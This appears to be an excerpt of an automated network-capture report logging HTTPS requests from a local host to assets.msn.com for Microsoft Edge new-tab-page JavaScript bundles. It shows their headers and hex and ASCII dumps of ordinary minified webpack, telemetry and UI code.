                                                                                                                                                                  Data Ascii: 6,r.b$,o.HD,o.hj,o.jn,o.mf,o.kJ,o.Kn,o.nd,r.MF,o.Y6,r.cp,s.p7,s.UY,o.l_,l.c9,l.Ib,o.Id,o.rW,o.Ym,o.o8,o.le,o.nr,o.mf,o.Kn,o.J_,o.kJ,o.VZ,o.HD,o.hj,o.jn,o.Y6,o.tO,o.UA,o.Mr,o.Xz,o.nd,d.pu,o.FY,o.l_,l.Ib,o.m6,r.w1,a.GW,a.Jj,u.pZ,u.az,u._l,u.CN,u.F6,a.DO;fun
                                                                                                                                                                  2025-01-11 06:54:30 UTC10457INData Raw: 6e 20 4e 7d 2c 4d 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 74 7d 2c 4f 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 74 7d 2c 55 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 74 7d 2c 56 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 7d 2c 56 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 74 7d 2c 58 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 74 7d 2c 59 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 7d 2c 59 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 7d 2c 5f 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 74 7d 2c 5f 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 7d 2c 5f 79 3a 66
                                                                                                                                                                  Data Ascii: n N},Mr:function(){return et},Oi:function(){return yt},UA:function(){return tt},VZ:function(){return K},Vb:function(){return wt},Xz:function(){return nt},Y6:function(){return Y},Ym:function(){return R},_A:function(){return lt},_Q:function(){return U},_y:f
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 5d 3b 72 65 74 75 72 6e 20 6d 7c 7c 28 6d 3d 65 5b 64 5d 3d 7b 7d 29 2c 65 2e 73 65 74 4e 65 78 74 28 76 29 2c 74 26 26 28 30 2c 63 2e 4c 6d 29 28 65 5b 61 2e 6f 56 5d 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2b 22 3a 22 2b 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 5b 70 5d 3d 21 30 3b 74 72 79 7b 76 61 72 20 74 3d 76 3f 76 2e 5f 69 64 3a 61 2e 71 53 3b 74 26 26 28 6d 5b 74 5d 3d 21 31 29 2c 66 3d 6e 28 65 29 7d 63 61 74 63 68 28 74 29 7b 76 61 72 20 63 3d 21 76 7c 7c 6d 5b 76 2e 5f 69 64 5d 3b 63 26 26 28 66 3d 21 30 29 2c 76 26 26 63 7c 7c 28 30 2c 72 2e 6b 50 29 28 65 5b 69 2e 6d 63 5d 28 29 2c 31 2c 37 33 2c 22 50 6c 75 67 69 6e 20 5b 22 2b 67 2b 22 5d 20 66 61 69 6c 65 64 20 64 75
                                                                                                                                                                  Data Ascii: 00004000d];return m||(m=e[d]={}),e.setNext(v),t&&(0,c.Lm)(e[a.oV](),(function(){return g+":"+s}),(function(){m[p]=!0;try{var t=v?v._id:a.qS;t&&(m[t]=!1),f=n(e)}catch(t){var c=!v||m[v._id];c&&(f=!0),v&&c||(0,r.kP)(e[i.mc](),1,73,"Plugin ["+g+"] failed du
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 54 79 70 65 5d 3b 21 76 74 28 0d 0a
                                                                                                                                                                  Data Ascii: Type];!vt(
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 2e 73 65 6e 64 54 79 70 65 29 26 26 65 2e 69 73 42 65 61 63 6f 6e 26 26 32 3d 3d 3d 65 2e 73 65 6e 64 52 65 61 73 6f 6e 26 26 28 67 3d 70 5b 32 5d 7c 7c 70 5b 33 5d 7c 7c 67 29 3b 76 61 72 20 76 3d 64 74 3b 28 65 2e 69 73 42 65 61 63 6f 6e 7c 7c 33 3d 3d 3d 67 2e 5f 74 72 61 6e 73 70 6f 72 74 29 26 26 28 76 3d 21 31 29 3b 76 61 72 20 6d 3d 6b 74 28 65 2c 76 29 3b 76 3d 76 7c 7c 6d 2e 75 73 65 48 64 72 73 3b 76 61 72 20 62 3d 28 30 2c 63 2e 68 4b 29 28 29 3b 28 30 2c 6f 2e 4c 6d 29 28 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 48 74 74 70 4d 61 6e 61 67 65 72 3a 5f 64 6f 50 61 79 6c 6f 61 64 53 65 6e 64 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 70 3d 30 3b 70 3c 65 2e 62 61
                                                                                                                                                                  Data Ascii: 00004000e.sendType)&&e.isBeacon&&2===e.sendReason&&(g=p[2]||p[3]||g);var v=dt;(e.isBeacon||3===g._transport)&&(v=!1);var m=kt(e,v);v=v||m.useHdrs;var b=(0,c.hK)();(0,o.Lm)(y,(function(){return"HttpManager:_doPayloadSend"}),(function(){for(var p=0;p<e.ba
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 22 7c 22 29 3b 69 2e 6c 65 6e 0d 0a
                                                                                                                                                                  Data Ascii: "|");i.len
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 67 74 68 3e 30 26 26 6e 2e 73 65 74 49 64 28 69 5b 30 5d 29 3b 74 72 79 7b 69 66 28 69 2e 6c 65 6e 67 74 68 3e 31 29 7b 76 61 72 20 72 3d 2b 69 5b 31 5d 3b 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 72 29 2c 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3d 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3e 30 3f 6e 2e 61 63 71 75 69 73 69 74 69 6f 6e 44 61 74 65 3a 30 7d 69 66 28 69 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 6f 3d 2b 69 5b 32 5d 3b 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 2b 6e 65 77 20 44 61 74 65 28 6f 29 2c 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3d 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3e 30 3f 6e 2e 72 65 6e 65 77 61 6c 44 61 74 65 3a 30 7d 7d 63 61 74
                                                                                                                                                                  Data Ascii: 00018000gth>0&&n.setId(i[0]);try{if(i.length>1){var r=+i[1];n.acquisitionDate=+new Date(r),n.acquisitionDate=n.acquisitionDate>0?n.acquisitionDate:0}if(i.length>2){var o=+i[2];n.renewalDate=+new Date(o),n.renewalDate=n.renewalDate>0?n.renewalDate:0}}cat
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 54 5b 62 5d 7c 7c 28 54 5b 62 5d 3d 7b 6f 3a 28 69 3d 7b 7d 2c 69 5b 78 5d 3d 21 30 2c 69 5b 77 5d 3d 21 30 2c 69 29 2c 6e 3a 31 65 33 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 26 26 43 5b 73 5d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 74 3d 3d 3d 43 5b 73 5d 7c 7c 74 3d 3d 3d 41 72 72 61 79 5b 73 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 74 29 7b 72 65 74 75 72 6e 20 49 28 74 29 7c 7c 74 3d 3d 3d 46 75 6e 63 74 69 6f 6e 5b 73 5d 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 29 7b 76 61 72 20 65 3b 69 66 28 74 29 7b 69 66 28 6b 29 72 65 74 75 72 6e 20 6b 28 74 29 3b 76 61 72 20 6e 3d 74 5b 76 5d 7c 7c 74 5b 73 5d
                                                                                                                                                                  Data Ascii: T[b]||(T[b]={o:(i={},i[x]=!0,i[w]=!0,i),n:1e3});function O(t,e){return t&&C[s].hasOwnProperty.call(t,e)}function I(t){return t&&(t===C[s]||t===Array[s])}function E(t){return I(t)||t===Function[s]}function D(t){var e;if(t){if(k)return k(t);var n=t[v]||t[s]
                                                                                                                                                                  2025-01-11 06:54:30 UTC1387INData Raw: 77 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 63 6f 6e 73 74 20 69 3d 5b 30 2c 35 34 30 2c 37 36 38 2c 31 30 38 34 2c 31 34 30 30 2c 31 37 37 39 5d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 3d 69 29 7b 66 6f 72 28 6c 65 74 20 6e 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 6e 3e 3d 30 3b 6e 2d 2d 29 69 66 28 74 3e 3d 65 5b 6e 5d 29 72 65 74 75 72 6e 20 6e 7d 7d 2c 33 34 37 35 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 67 65 74 47 6c 6f 62 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                                                                                                                  Data Ascii: wk:function(){return r}});const i=[0,540,768,1084,1400,1779];function r(t,e=i){for(let n=e.length-1;n>=0;n--)if(t>=e[n])return n}},34757:function(){var t;!function(t){var e=function(){function t(){}return t.getGlobal=function(){return"undefined"!=typeof g


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  5192.168.11.206230423.45.46.202443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC615OUTGET /bundles/v1/edgeChromium/latest/common.645cb4eb2f9e0802adfb.js HTTP/1.1
                                                                                                                                                                  Host: assets.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:30 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: MHvAXttI2dRWpYrnZCMVMw==
                                                                                                                                                                  Last-Modified: Fri, 10 Jan 2025 20:39:44 GMT
                                                                                                                                                                  ETag: 0x8DD31B6EAC9F297
                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                  x-ms-request-id: d152a47e-101e-0055-6a9f-634a94000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Connection: Transfer-Encoding
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                  Akamai-Request-BC: [a=23.208.24.82,b=3069602986,c=g,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=118, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.208.24.82
                                                                                                                                                                  Akamai-Request-ID: b6f66caa
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.5218d017.1736578470.b6f66caa
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  2025-01-11 06:54:30 UTC15145INData Raw: 30 30 30 30 43 30 30 30 0d 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 6d 6d 6f 6e 22 2c 22 6d 73 6e 65 77 73 2f 70 75 62 6c 69 73 68 65 72 73 2d 73 65 72 76 69 63 65 2d 63 6c 69 65 6e 74 22 5d 2c 7b 38 35 32 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 24 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 24 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 2c 42 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 42 64 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                  Data Ascii: 0000C000(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["common","msnews/publishers-service-client"],{85289:function(e,t,n){"use strict";n.d(t,{$6:function(){return C},$W:function(){return A},BA:function(){return l},Bd:functio
                                                                                                                                                                  2025-01-11 06:54:30 UTC16260INData Raw: 64 69 74 73 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 5b 74 68 69 73 2e 69 6d 61 67 65 49 64 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 74 74 72 69 62 75 74 69 6f 6e 2c 69 73 44 69 73 70 6c 61 79 65 64 3a 21 30 2c 74 69 74 6c 65 3a 6e 75 6c 6c 2c 74 69 74 6c 65 55 52 4c 3a 6e 75 6c 6c 7d 29 7d 67 65 74 4c 6f 63 54 69 74 6c 65 4b 65 79 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6d 61 67 65 49 64 3c 3d 74 68 69 73 2e 63 6d 73 53 69 7a 65 3f 60 69 6d 61 67 65 24 7b 74 68 69 73 2e 69 6d 61 67 65 49 64 7d 60 3a 60 73 69 6d 70 6c 65
                                                                                                                                                                  Data Ascii: dits:null===(t=this.config)||void 0===t||null===(t=t.data)||void 0===t||null===(t=t[this.imageId])||void 0===t?void 0:t.attribution,isDisplayed:!0,title:null,titleURL:null})}getLocTitleKey(){return this.imageId<=this.cmsSize?`image${this.imageId}`:`simple
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 70 6c 61 79 43 68 61 6e 67 65 64 3d 74 29 2c 74 26 26 74 68 69 73 2e 64 69 73 70 6c 61 79 4d 61 72 71 75 65 65 41 64 26 26 22 61 6c 77 61 79 73 22 21 3d 3d 65 2e 73 65 6c 65 63 74 65 64 46 65 65 64 44 69 73 70 6c 61 79 53 65 74 74 69 6e 67 26 26 28 74 68 69 73 2e 64 69 73 70 6c 61 79 4d 61 72 71 75 65 65 41 64 3d 21 31 2c 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 44 61 74 61 43 6f 6e 6e 65 63 74 6f 72 2e 6d 61 72 71 75 65 41 64 44 69 73 70 6c 61 79 53 74 61 74 75 73 55 70 64 61 74 65 64 28 21 31 29 29 2c 74 68 69 73 2e 64 69 73 70 6c 61 79 4d 61 72 71 75 65 65 41 64 29 7b 65 2e 63 75 72 72 65 6e 74 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 54 79 70 65 21 3d 3d 74 68 69 73 2e 63 68 72 6f 6d 69 75 6d 50 61 67 65 53 65 74 74 69 6e 67 73 53 74 61 74 65
                                                                                                                                                                  Data Ascii: playChanged=t),t&&this.displayMarqueeAd&&"always"!==e.selectedFeedDisplaySetting&&(this.displayMarqueeAd=!1,this.backgroundDataConnector.marqueAdDisplayStatusUpdated(!1)),this.displayMarqueeAd){e.currentBackgroundImageType!==this.chromiumPageSettingsState
                                                                                                                                                                  2025-01-11 06:54:30 UTC1375INData Raw: 73 2e 72 65 66 5f 6d 61 72 71 75 65 65 41 64 44 69 73 6d 69 73 73 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 26 26 74 68 69 73 2e 72 65 66 5f 6d 61 72 71 75 65 65 41 64 44 69 73 6d 69 73 73 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 6d 75 73 65 75 6d 43 61 72 64 5f 68 69 64 65 22 29 2c 74 68 69 73 2e 73 68 6f 75 6c 64 55 70 64 61 74 65 4d 61 72 71 75 65 65 41 64 44 69 73 6d 69 73 73 42 75 74 74 6f 6e 56 69 73 69 62 69 6c 69 74 79 3d 21 31 29 29 2c 22 56 69 64 65 6f 22 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 26 26 28 65 3f 74 68 69 73 2e 76 69 64 65 6f 50 72 6f 76 69 64 65 72 2e 70 6c 61 79 56 69 64 65 6f 28 22 53 63 72 6f 6c 6c 22 29 3a 74 68 69 73 2e 76 69 64 65 6f 50 72 6f
                                                                                                                                                                  Data Ascii: s.ref_marqueeAdDismissButtonContainer&&this.ref_marqueeAdDismissButtonContainer.classList.add("museumCard_hide"),this.shouldUpdateMarqueeAdDismissButtonVisibility=!1)),"Video"===this.currentProvider&&(e?this.videoProvider.playVideo("Scroll"):this.videoPro
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 74 68 69 73 2e 75 70 64 61 74 65 48 6f 6c 69 64 61 79 42 61 63 6b 67 72 6f 75 6e 64 28 65 2c 21 30 29 2c 74 68 69 73 2e 64 65 66 69 6e 65 43 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 41 6e 64 53 79 6e 63 28 29 2c 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 26 26 74 68 69 73 2e 75 70 64 61 74 65 50 72 6f 70 65 72 74 69 65 73 28 29 7d 2c 74 68 69 73 2e 6f 6e 47 61 6c 6c 65 72 79 41 70 70 6c 69 65 64 3d 28 29 3d 3e 7b 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 53 6f 75 72 63 65 43 68 61 6e 67 65 64 3d 21 30 2c 74 68 69 73 2e 64 65 66 69 6e 65 43 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 28 29 7d 2c 74 68 69 73 2e 73 74 61 74 65 73 53 79 6e 63 49 6e 69 74 3d 28 29 3d 3e 7b
                                                                                                                                                                  Data Ascii: 00004000this.updateHolidayBackground(e,!0),this.defineCurrentProviderAndSync(),"CMSImage"===this.currentProvider&&this.updateProperties()},this.onGalleryApplied=()=>{this.backgroundSourceChanged=!0,this.defineCurrentProvider()},this.statesSyncInit=()=>{
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 30 2c 62 2e 24 6f 29 28 29 2e 0d 0a
                                                                                                                                                                  Data Ascii: 0,b.$o)().
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 67 65 74 4f 62 6a 65 63 74 28 74 68 69 73 2e 68 6f 6c 69 64 61 79 4b 65 79 2b 22 55 73 65 72 22 29 3b 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3b 6c 65 74 20 74 3d 21 31 3b 63 6f 6e 73 74 20 69 3d 55 2e 70 2e 67 65 74 50 72 65 66 65 72 65 6e 63 65 42 79 4b 65 79 46 72 6f 6d 46 72 6f 6d 50 72 65 66 65 72 65 6e 63 65 73 43 61 63 68 65 28 44 2e 77 49 2e 62 61 63 6b 67 72 6f 75 6e 64 53 65 6c 65 63 74 69 6f 6e 4d 65 74 61 64 61 74 61 29 3b 69 26 26 69 2e 63 6f 6e 66 69 67 49 6e 64 65 78 26 26 28 74 3d 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 69 2e 70 72 6f 76 69 64 65 72 7c 7c 22 56 69 64 65 6f 22 3d 3d 3d 69 2e 70 72 6f 76 69 64 65 72 29 2c 6e 26 26 21 74 26 26 28 74 68 69 73 2e 73 73 72 42 61 63 6b 67 72 6f 75 6e 64 4d 65 74 61 64 61
                                                                                                                                                                  Data Ascii: 00004000getObject(this.holidayKey+"User");n=void 0===e;let t=!1;const i=U.p.getPreferenceByKeyFromFromPreferencesCache(D.wI.backgroundSelectionMetadata);i&&i.configIndex&&(t="CMSImage"===i.provider||"Video"===i.provider),n&&!t&&(this.ssrBackgroundMetada
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 69 67 68 74 2d 6f 66 66 2e 73 0d 0a
                                                                                                                                                                  Data Ascii: ight-off.s
                                                                                                                                                                  2025-01-11 06:54:30 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 76 67 22 29 2c 59 65 3d 47 65 2e 69 60 20 2e 62 61 63 6b 67 72 6f 75 6e 64 42 75 74 74 6f 6e 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 62 61 63 6b 67 72 6f 75 6e 64 47 61 6c 6c 65 72 79 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 7d 2e 6d 61 72 71 75 65 65 41 64 44 69 73 6d 69 73 73 42 75 74 74 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 6c 65 66 74 3a 69 6e 69 74 69 61 6c 3b 72 69 67 68 74 3a 31 32 70 78 7d 2e 63 6f 70 79 72 69 67 68 74 43 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 32 70 78 7d 2e 6d 75 73 65 75 6d 43 61 72 64 7b 6c 65 66 74 3a 69 6e 69 74 69 61 6c 3b 72 69 67 68 74 3a 31 32 70 78 7d 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 7b 66
                                                                                                                                                                  Data Ascii: 00004000vg"),Ye=Ge.i` .backgroundButton{float:right}.backgroundGalleryButtonContainer{padding-left:12px}.marqueeAdDismissButtonContainer{left:initial;right:12px}.copyrightContainer{padding-left:12px}.museumCard{left:initial;right:12px}.secondaryButton{f
                                                                                                                                                                  2025-01-11 06:54:30 UTC12INData Raw: 65 78 42 75 74 74 6f 6e 53 74 0d 0a
                                                                                                                                                                  Data Ascii: exButtonSt


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  6192.168.11.206105223.45.46.202443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:30 UTC619OUTGET /bundles/v1/edgeChromium/latest/experience.639a3a8baab8493c4920.js HTTP/1.1
                                                                                                                                                                  Host: assets.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:30 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                  Content-MD5: WFJOAnl5+QnYSOo4tZsbkQ==
                                                                                                                                                                  Last-Modified: Fri, 10 Jan 2025 20:39:45 GMT
                                                                                                                                                                  ETag: 0x8DD31B6EB51C392
                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                  x-ms-request-id: ceffbcf1-a01e-0100-659f-634570000000
                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:30 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Connection: Transfer-Encoding
                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                  Akamai-Request-BC: [a=23.208.24.74,b=3495913594,c=g,n=US_IL_CHICAGO,o=20940]
                                                                                                                                                                  Server-Timing: clientrtt; dur=118, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                  Akamai-Server-IP: 23.208.24.74
                                                                                                                                                                  Akamai-Request-ID: d05f687a
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                  Akamai-GRN: 0.4a18d017.1736578470.d05f687a
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  2025-01-11 06:54:30 UTC15145INData Raw: 30 30 30 30 43 30 30 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 69 2c 61 2c 72 3d 7b 32 33 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 69 3d 6e 28 36 35 31 37 35 29 2c 61 3d 6e 28 36 33 30 37 30 29 2c 72 3d 6e 28 33 39 30 30 31 29 2c 73 3d 6e 28 32 32 33 39 30 29 2c 64 3d 6e 28 34 34 38 38 36 29 2c 63 3d 6e 28 34 30 39 32 34 29 3b 76 61 72 20 6c 3d 6e 28 32 38 39 30 34 29 2c 70 3d 6e 28 39 39 34 35 32 29 2c 68 3d 6e 28 34 32 35 39 30 29 2c 75 3d 6e 28 39 34 35 33 37 29 2c 6d 3d 6e 28 38 35 32 30 35 29 2c 67 3d 6e 28 34 37 34
                                                                                                                                                                  Data Ascii: 0000C000!function(){var e,t,n,o,i,a,r={23865:function(e,t,n){"use strict";n.d(t,{S:function(){return q}});var o=n(33940),i=n(65175),a=n(63070),r=n(39001),s=n(22390),d=n(44886),c=n(40924);var l=n(28904),p=n(99452),h=n(42590),u=n(94537),m=n(85205),g=n(474
